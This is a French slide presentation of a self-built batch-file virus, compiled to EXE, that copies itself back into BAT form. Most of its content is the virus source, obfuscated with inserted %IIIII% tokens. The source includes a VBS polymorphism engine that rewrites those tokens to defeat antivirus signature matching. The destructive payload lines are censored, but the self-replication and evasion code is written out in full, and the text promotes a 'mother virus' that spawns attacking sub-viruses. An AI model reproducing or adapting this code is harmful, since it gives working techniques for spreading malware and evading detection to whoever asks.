VIRUS AUTODECOMPILEMENT EXE en BAT Prsentation de mon
VIRUS : AUTO-DECOMPILEMENT EXE en BAT Présentation de mon travail sur un virus informatique compilé en exécutable, capable après un processus Randomizing d’effectuer un décompilement de lui-même pour passer de *. exe en *. bat. Auteur, travaux, idée, concept : Samuel De Cruz (NEPRAM HACKER, catégorie White Hat) Etudiant Psychologue et Psychanalyste – Artiste Futuriste – Diplômé Informatique et Anglais. 11/10/2017 Contact : samdec 86@yahoo. fr Document d’étude au respect des vrais Hackers et des experts informaticiens – étude de bienveillance – pour la curiosité et l’intellectualisme en matière de virologie informatique. Usage hostile interdit.
Dans un premier temps il nous faut d’abord écrire notre virus en BATCH. Puis, on utilise BAT_to_EXE pour le compiler en exécutable. Attention, d’autres softwares ne seront pas optimaux : par exemple, BATCH COMPILER ne fonctionne pas pour l’auto-décompilement. Je ne vais pas expliquer le fonctionnement de BAT_to_EXE car ce n’est pas le sujet de ce document d’étude. Nous avons donc notre virus souche en BATCH et le virus compiler en exécutable. L’objectif étant que le virus exécutable, effectue quelques attaques (ou passe directement en auto-décompilation), puis, par la suite, s’auto-décompile. Nous retrouvons notre processus de Randomizing, efficace contre la prédictibilité.
@e%IIIII%cho o%IIIII%ff i%IIIII%f exist X. vbs goto : M 5 if n%IIIII%ot exist X. vbs goto : Randomizing REM ----------------: Randomizing set /a n=%random%%%4 if %n%==0 goto : M 1 if %n%==1 goto : M 2 if %n%==2 goto : M 3 if %n%==3 goto : M 4 REM ---------------- 1 : M 1 echo A REM VIOLENCE A pi%IIIII%ng 0. 0 -n 5 > NUL go%IIIII%to : Randomizing REM ---------------- 2 : M 2 ech%IIIII%o B REM VIOLENCE B ping 0. 0 -n 5 > NUL go%IIIII%to : Randomizing REM ---------------- 3 : M 3 ec%IIIII%ho C REM VIOLENCE C ping 0. 0 -n 5 > NUL go%IIIII%to : Randomizing REM ---------------- 4 : M 4 Si le moteur de polymorphisme est déjà existant poursuivre sur copie alternative. RANDOMIZING L’algorithme de notre VIRUS souche. Chapitre violence 1 Pour la BIENVEILLANCE : REM VIOLENCE A signifie que là est écrite normalement la commande de violence… Volontairement censurée. Chapitre violence 2 Pour la BIENVEILLANCE : REM VIOLENCE B signifie que là est écrite normalement la commande de violence… Volontairement censurée. Chapitre violence 3 Pour la BIENVEILLANCE : REM VIOLENCE C signifie que là est écrite normalement la commande de violence… Volontairement censurée. Voir slide suivante
cls ping 0. 0 -n 2 > NUL ec%IIIII%ho Const For. Reading = 1 >>X. vbs ec%IIIII%ho Const For. Writing = 2 >>X. vbs ech%IIIII%o CHARa. High = 90 >>X. vbs e%IIIII%cho CHARa. Low = 65 >>X. vbs moteur de polymorphisme externe en VBS echo For W = 1 to 1 >>X. vbs ech%IIIII%o Randomize>>X. vbs echo CHARa = Int((CHARa. High - CHARa. Low + 1) * Rnd + CHARa. Low)>>X. vbs ec%IIIII%ho CHARax = (Chr(CHARa))+(Chr(CHARa))+(Chr(CHARa))+(Chr(CHARa))>>X. vbs echo Next>>X. vbs ec%IIIII%ho Dim fso. N, z 2609 N>>X. vbs ech%IIIII%o Dim st. N>>X. vbs e%IIIII%cho Set fso. N = Create. Object("Scripting. File. System. Object")>>X. vbs ec%IIIII%ho Set z 2609 N = fso. N. Open. Text. File(". XXXX. bat", For. Reading)>>X. vbs echo st. N = z 2609 N. read. All>>X. vbs e%IIIII%ch%IIIII%o z 2609 N. Close>>X. vbs ec%IIIII%ho Set z 2609 N = fso. N. Open. Text. File(". XXXX. bat", For. Writing)>>X. vbs ech%IIIII%o z 2609 N. Write replace(st. N, "IIIII", (CHARax))>>X. vbs e%IIIII%cho z 2609 N. close>>X. vbs ec%IIIIIIIIII%ho. Copie alternative de soi-même avec effet du T%IIIII%ype %~nx 0 >> XXXX. bat polymorphe qui changera %IIIII% ec%IIIIIIIIII%ho. s%IIIII%tart X. vbs Copie alternative de soi-même E%IIIII%XIT : M 5 set POLYNAME=A%random%AAA%random%A ec%IIIII%ho %POLYNAME% Type %~nx 0 >> %POLYNAME%. bat EXIT L’algorithme de notre VIRUS souche.
Le Moteur du Polymorphe en VBS (lui est externe au virus, il est dans le script « X. vbs » . S’il existe déjà, le virus fera une copie de lui-même en changeant juste son titre, mais pas son segment %IIIII%)
Colonne de gauche, on remarque le virus souche. La colonne de droite, une copie du virus avec effet du polymorphe qui à transformé %IIIII% en %DDDDD% Le but de cette manipulation étant de perturber la lecture par l’Antivirus. Cette copie du virus est différente, même si cette différence est légère, elle empêche une reconnaissance exacte (par rapport à la souche) du virus.
Pour ce qui est du décompilement, en fait, on ordonne au VIRUS exécutable de faire une copie de son exécution temporaire directement au format de souche, BATCH. La commande étant « TYPE » pour une copie totale de l’algorithme. Et cela fonctionne à merveille (si le compilement est effectué auparavant avec BAT_to_EXE) Type %~nx 0 >> XXXX. bat Cela est intéressant dans la mesure où si le virus BATCH est repéré par l’ANTIVIRUS, la version EXE restera encore intact…peut-être, mais c’est déjà un bon pas pour aider le virus à changer de format sans être trop rapidement détecté. Métamorphisme ? J’avoue que c’est intéressant de parler ici de métamorphisme pour cette phase d’auto-décompilation car on change totalement de format…cela reste ouvert à la critique. Je dirais qu’il ne s’agit pas d’un métamorphisme aussi beau que d’autres et pas aussi pur que de l’assembleur, mais cela reste une sorte de métamorphisme rapide d’une génération trans-format (Exe vers BAT).
Ce travail, présenté dans ce document, apporte des visions : il permet de créer toute une famille de redoutable virus-maman. Au-delà de nombreuses stratégies envisageables, je trouve celle-ci redoutable : imagions que le virus EXE soit la maman qui auto-décompile des sous-chapitres d’elle-même en virus externes esclaves au format BATCH ! Véritable horreur, cette monstruosité aurait de nombreuses conséquences hasardeuses ! Et cela n’est en rien impossible. Une idée proche de celle-ci figure dans mon Virus « NYPERIUS » qui réalise 6 sous virus d’attaques, des « enfants soldats » qui feront le méchant travail tandis que la « maman » reste discrète en arrière, dissimulé dans l’ombre de l’ordinateur. Pour la bienveillance, uniquement l’idée et la méthode sont présentés. Les commandes de destruction ou de violence ne sont pas montrées.
La redoutable horreur du virus « NYPERIUS » , un virus-maman qui construit des virus esclaves ( « enfants soldats » ) envoyés pour le combat, qui effectueront les violences. Ce virus sera l’objet d’étude et de présentation dans un autre document. Pour extraire mes travaux et étudier l’algorithme d’auto-décompilation, cliquer sur l’icône suivant Mdp : virtuality : VIRUS « NYPERIUS » Virus-mère Virus-enfant Auteur : Samuel De Cruz
- Slides: 9